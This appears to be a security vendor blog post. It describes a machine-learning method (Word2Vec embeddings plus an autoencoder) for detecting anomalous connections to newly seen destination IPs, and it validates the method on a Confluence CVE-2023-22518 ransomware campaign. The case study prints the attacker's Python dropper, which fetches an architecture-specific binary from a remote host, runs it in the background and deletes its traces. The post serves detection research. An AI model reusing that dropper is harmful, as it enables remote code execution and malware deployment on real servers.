App and API Security

Ido Sakazi is a Data Scientist and Senior Security Researcher at Akamai, focusing on cyber and network security data science projects. His expertise is in leveraging advanced data analysis and machine learning techniques to detect and mitigate potential threats.

Written by

Yonatan Gilvarg

Yonatan Gilvarg is a Senior Security Researcher on the Akamai Hunt Team. His areas of expertise include threat detection and research, big data anomaly detection, and incident response.

Introduction

Securing enterprise network traffic is crucial in the fight against threat actors who are trying to harm organizations and cause irreparable damage. The identification of new and potentially malicious destination IPs plays a key role in this defense — you can’t protect what you don’t know needs to be protected.

The ability to detect anomalous connections to these previously unseen destination IPs is a powerful tool, providing administrators with insights and warnings about potential threats.

Our focus on previously unseen destination IPs stems from the recognition that threat actors frequently exploit these new IP addresses to bypass traditional security measures, making it essential to prioritize detection efforts accordingly.

In this blog post, we present a machine learning method that detects anomalous connections to new destination IPs that are accessed from network organization nodes. We used the connections’ metadata to create the method. Our approach involves employing the Word2Vec algorithm to represent features associated with destination IPs and apply a final step of autoencoder.

We used this method in a real-world campaign and it led to a successful detection. Suspicious IP addresses are potentially involved in malicious activities — such as command and control (C2) servers, botnets, and phishing domains — so quick detection can be the difference between an alert and an incident.

Jump to real-world incident

Identifying a suspicious new destination IP is challenging

We encountered several challenges in our effort to detect and mitigate threats posed by new unseen destination IPs. Because these IPs lack prior reputation or historical data, traditional detection methods are ineffective. Their novelty makes it challenging to distinguish benign first-time communications from malicious ones, as they can resemble everyday traffic patterns.

We found that analyzing the sequence of the source process, destination port, autonomous system number (ASN), and geolocation linked to the destination IP was successful in addressing these challenges. By doing so, we gained more profound insights into the context of network traffic. This approach enabled us to significantly improve our ability to identify and flag suspicious new destination IPs.

Anomaly detection

Our methodology uses machine learning techniques that fit the unique challenges of anomaly detection in network traffic. We gather diverse metadata associated with network traffic data that contains crucial information about source processes, destination ports, ASNs, geolocations, and more. Diverse datasets are required for a thorough analysis, and classification is required for proper output.

We categorize and group the source process and destination port based on their respective roles for easier analysis. For example, we consolidated different Structured Query Language (SQL) servers’ standard ports (such as MSSQL 1433 and MySQL 3306) into a single category: SQL server.

Using machine learning for anomaly detection

We apply the Word2Vec algorithm to capture the semantic similarities between different IPs based on the context of network analysis. Word2Vec, which was originally developed for natural language processing, learns vector representations by analyzing the context in which elements appear.

In our approach, we model sequences of network metadata as input to the algorithm, allowing it to learn meaningful embeddings that reflect behavioral relationships across the network. This enables more effective anomaly detection and pattern recognition.

By representing IPs as high-dimensional vectors, we enable the algorithm to identify patterns of IPs that frequently appear together in network traffic. IPs that are clustered closely in vector space have strong contextual relationships, while outliers or anomalies are positioned farther away. This approach offers valuable insights into the structure and dynamics of the network traffic.

In the final stage of our methodology, we use an autoencoder — a type of artificial neural network designed for unsupervised learning that aims to compress and reconstruct input data efficiently. The autoencoder allows us to detect anomalies in network traffic without relying on labeled training data. This enables our algorithm to adapt to evolving threat scenarios and detect novel attack patterns effectively.

The embedding features are fed into the autoencoder, enabling it to learn and reconstruct normal network traffic patterns (Figure 1). Connections with high reconstruction errors are flagged as potential malicious activity.

Anomaly validation

A core tenet of this methodology is continuous review and learning. By applying our algorithm, we can review all new destination IPs and check each connection between them daily to identify anomalies and, thus, identify potentially malicious behavior.

Figure 2 is a real example of a daily output for a customer. There were 462 new destination IPs in that single day.

The horizontal red line represents the threshold for flagging a connection as anomalous. Any connection that results in a reconstruction error above this line would be considered suspicious.
The blue dots signify those IPs that our system determined to be benign, as they displayed low reconstruction errors and matched the expected pattern of network behavior.
The orange dot represents a single IP that our analysis flagged as anomalous due to its high reconstruction error.

The anomaly was subsequently investigated and confirmed to be a component of a campaign attack, underscoring the robustness and critical importance of our detection mechanisms. The next section includes the details of the attack.

How our algorithm successfully detected an attack in a customer environment

New methodology is great in theory, but it must be practical to be truly valuable. We chose to run our algorithm against a previously detected attack, which was part of a known Confluence campaign exploiting the CVE-2023-22518 vulnerability. This attack led to remote code execution and the deployment of ransomware.

In this case, the initial exploitation allowed attackers unauthorized access to the server. They established a connection to a command and control (C2) server via Python and downloaded a malicious file named qnetd (Figure 3).

python3 -c import os,sys,time import platform as p if sys.version_info.major == 3: import urllib.request as u else: import urllib2 as u h = /tmp/lru d = ./qnetd ml = {3x:[i386,i686], 6x:[x86_64,amd64], 3a:[arm], 6a:[aarch64]} try: m = p.machine().lower() if os.popen(id -u).read().strip() == 0: try: os.chdir(/var) except: os.chdir(/tmp) else: os.chdir(/tmp) for l in open(h): for k,al in ml.items(): for a in al: if a == m: l = l+.+k r = u.urlopen(l) with open(d, wb) as f: f.write(r.read()) f.flush() r.close() os.system(chmod +x +d) os.system(chmod 755 +d) os.system(d +  > /dev/null 2>&1 &) time.sleep(5) os.remove(d) os.remove(h) except: if os.path.exists(h): os.remove(h) if os.path.exists(d): os.remove(d) pass

Fig. 3: Malicious python command identified in investigation

We observed two servers communicating with the malicious IP address, which was part of the widespread Atlassian Confluence CVE-2023-22518 campaign from both the Python and qnetd process, which were detected in our method as the Geolocation was anomalous (Figure 4).

Enabling the proactive identification of suspicious network connections

Detecting anomalous network connections to new destination IPs is a critical aspect of enterprise cybersecurity. By leveraging Word2Vec and autoencoder techniques, our approach analyzes network traffic metadata such as source processes, destination ports, and geolocation to identify potential security threats that might bypass traditional detection methods.

In a real-world case study, our method successfully uncovered a sophisticated attack that was exploiting a Confluence vulnerability (CVE-2023-22518), which demonstrated the method’s effectiveness in detecting a malicious IP that was part of a ransomware deployment campaign.

The technique will enable organizations to proactively identify suspicious network connections by learning and flagging deviations from normal traffic patterns.

Find out more

To learn more about our managed threat hunting service, visit our Akamai Hunt web page.

Learn more

Sep 30, 2025

Ido Sakazi and Yonatan Gilvarg

Written by

Ido Sakazi

Written by

Yonatan Gilvarg

Yonatan Gilvarg is a Senior Security Researcher on the Akamai Hunt Team. His areas of expertise include threat detection and research, big data anomaly detection, and incident response.

Security

App and API Security

Zero Trust Security

Bot & Abuse Protection

INFRASTRUCTURE SECURITY

Cloud Computing

Content Delivery

APPLICATION PERFORMANCE

MEDIA DELIVERY

EDGE APPLICATIONS

MONITORING, REPORTING, AND TESTING

CLOUD COMPUTING

SECURITY

CONTENT DELIVERY

Library

How to Secure Enterprise Networks by Identifying Malicious IP Addresses

Introduction

Identifying a suspicious new destination IP is challenging

Anomaly detection

Using machine learning for anomaly detection

Anomaly validation

How our algorithm successfully detected an attack in a customer environment

Enabling the proactive identification of suspicious network connections

Find out more

Related Blog Posts

PRODUCTS

COMPANY

CAREERS

NEWSROOM

LEGAL & COMPLIANCE

GLOSSARY